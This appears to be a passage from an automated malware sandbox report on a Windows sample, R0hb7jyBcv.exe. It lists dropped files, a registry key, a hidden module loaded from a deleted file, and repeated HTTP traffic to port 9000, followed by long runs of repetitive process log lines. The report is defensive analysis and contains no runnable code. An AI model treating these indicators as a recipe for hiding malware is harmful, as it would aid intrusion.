Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\qbji			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QBJI
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PHTSHFCNNLUILU

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49865

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
